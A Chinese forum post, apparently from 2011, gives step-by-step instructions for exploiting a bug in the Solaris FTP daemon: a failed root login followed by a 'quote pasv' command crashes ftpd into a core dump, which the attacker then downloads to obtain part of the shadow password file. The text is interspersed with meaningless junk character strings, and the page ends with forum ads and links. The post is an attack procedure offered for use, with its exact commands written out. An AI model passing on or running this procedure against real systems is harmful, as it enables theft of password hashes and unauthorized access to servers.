该方法利用了Solaris 操作系统中FTPD的一个BUG,使得用户可以获得该机的口令文件。具体过程如下:
' {/ E; F6 t# N Q7 k9 d
! B1 W2 I" b, f' e' ]1.通过 ftp 正常登录到目的主机上" @/ k" h0 g S1 b/ ^
* N2 F3 c. I! y! H( N1 C
2.输入如下命令序列:
2 C' I; q3 ~( D7 R* l& o% A8 |( s1 P9 c( l: r5 P9 ?& m9 i
ftp> user root wrongpasswd- @. C9 [0 b$ B0 b+ G( M' z
: g% T' y: a* P! B; ?
ftp> quote pasv
y6 G! h& x! j* h& z$ q& F4 M
5 `7 o9 S* _, n9 j3.这时,ftpd会报错退出,同时会在当前目录下生成一个core,口令文件就包含在这个core中。* ?, B& z7 u( N
5 T/ Q4 ?) m6 H% V1 j4.再次进入FTP >get core4 ], u& A& @- o) o* I. M
/ Q5 \1 {7 W# l- k; P8 h9 F补充:虽然在core只有一部分shadow,但是对于系统来说已经是致命的打击了
: e6 n: [) `7 b) H3 q# s6 U" H% f' t6 ~7 z/ S
|
|本地广告联系: QQ:905790666 TEL:13176190456|Archiver|手机版|小黑屋|汶上信息港
( 鲁ICP备19052200号-1 )
发表于 2011-1-12 21:01:38
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡